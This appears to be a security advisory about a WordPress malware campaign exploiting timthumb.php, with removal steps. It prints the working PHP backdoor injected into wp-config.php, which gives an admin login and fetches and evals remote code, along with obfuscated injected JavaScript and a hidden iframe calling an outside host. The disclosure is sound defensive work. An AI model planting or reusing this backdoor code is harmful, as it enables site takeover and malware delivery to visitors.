New WordPress Malware Attack Exploiting timthumb.php Script
There is a new malware infection that has been affecting thousands of WordPress sites that utilize popular timthumb.php image resizing script.
Hackers create backdoor access in you website and inject malicious JavaScript that attempts to download various Trojans and malware on your visitor’s computers.
At this stage of the infection attackers are also modifying two of WordPress core files /wp-config.php and /wp-includes/js/l10n.js
The wp-config.php gets the following new lines of code that allows hackers backdoor access to your website:
if (isset($_GET['pingnow'])&& isset($_GET['pass'])){
if ($_GET['pass'] == ’66f041e16a60928b05a7e228a89c3799′){
if ($_GET['pingnow']== ‘login’){
$user_login = ‘admin’;
$user = get_userdatabylogin($user_login);
$user_id = $user->ID;
wp_set_current_user($user_id, $user_login);
wp_set_auth_cookie($user_id);
do_action(‘wp_login’, $user_login);
}
if (($_GET['pingnow']== ‘exec’)&&(isset($_GET['file']))){
$ch = curl_init($_GET['file']);
$fnm = md5(rand(0,100)).’.php’;
$fp = fopen($fnm, “w”);
curl_setopt($ch, CURLOPT_FILE, $fp);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
curl_exec($ch);
curl_close($ch);
fclose($fp);
echo “// ”;
}
if (($_GET['pingnow']== ‘eval’)&&(isset($_GET['file']))){
$ch = curl_init($_GET['file']);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
$re = curl_exec($ch);
curl_close($ch);
eval($re);
}}}
The attackers also add the following code to your l10n.js file.
var _0x4de4=["x64x20x35x28x29x7Bx62x20x30x3Dx32x2Ex63x28x22x33x22x29x3Bx32x2Ex39x2Ex36x28x30x29x3Bx30x2Ex37x3Dx27x33x27x3Bx30x2Ex31x2Ex61x3Dx27x34x27x3Bx30x2Ex31x2Ex6Bx3Dx27x34x27x3Bx30x2Ex69x3Dx27x66x3Ax2Fx2Fx67x2Dx68x2Ex6Dx2Fx6Ax2Ex65x27x7Dx38x28x35x2Cx6Cx29x3B","x7C","x73x70x6Cx69x74","x65x6Cx7Cx73x74x79x6Cx65x7Cx64x6Fx63x75x6Dx65x6Ex74x7Cx69x66x72x61x6Dx65x7Cx31x70x78x7Cx4Dx61x6Bx65x46x72x61x6Dx65x7Cx61x70x70x65x6Ex64x43x68x69x6Cx64x7Cx69x64x7Cx73x65x74x54x69x6Dx65x6Fx75x74x7Cx62x6Fx64x79x7Cx77x69x64x74x68x7Cx76x61x72x7Cx63x72x65x61x74x65x45x6Cx65x6Dx65x6Ex74x7Cx66x75x6Ex63x74x69x6Fx6Ex7Cx70x68x70x7Cx68x74x74x70x7Cx63x6Fx75x6Ex74x65x72x7Cx77x6Fx72x64x70x72x65x73x73x7Cx73x72x63x7Cx66x72x61x6Dx65x7Cx68x65x69x67x68x74x7Cx31x30x30x30x7Cx63x6Fx6D","x72x65x70x6Cx61x63x65","","x5Cx77x2B","x5Cx62","x67"];eval(function (_0x2f46x1,_0x2f46x2,_0x2f46x3,_0x2f46x4,_0x2f46x5,_0x2f46x6){_0x2f46x5=function (_0x2f46x3){return _0x2f46x3.toString(36)};if(!_0x4de4[5][_0x4de4[4]](/^/,String)){while(_0x2f46x3--){_0x2f46x6[_0x2f46x3.toString(_0x2f46x2)]=_0x2f46x4[_0x2f46x3]||_0x2f46x3.toString(_0x2f46x2);}_0x2f46x4=[function (_0x2f46x5){return _0x2f46x6[_0x2f46x5]}];_0x2f46x5=function (){return _0x4de4[6]};_0x2f46x3=1;};while(_0x2f46x3--){if(_0x2f46x4[_0x2f46x3]){_0x2f46x1=_0x2f46x1[_0x4de4[4]]( new RegExp(_0x4de4[7]+_0x2f46x5(_0x2f46x3)+_0x4de4[7],_0x4de4[8]),_0x2f46x4[_0x2f46x3]);}}return _0x2f46x1}(_0x4de4[0],23,23,_0x4de4[3][_0x4de4[2]](_0x4de4[1]),0,{}));
This appends an iframe to the bottom of your blog through which they can inject future malware:
<iframe id="iframe" src="http://counter-wordpress.com/frame.php" style="width: 1px; height: 1px; "></iframe>
Solution
- Immediately remove or update the timthumb.php script. When removing don’t forget to also update your theme files that rely on this functionality.
- Delete the cache folder located in the root of your template.
- Remove the code above from your wp-config.php file. Normally, the last line of that file should read: require_once(ABSPATH . ‘wp-settings.php’);
- Remove the code above from the /wp-includes/js/l10n.js file.
- Update all WordPress and FTP passwords for good measure.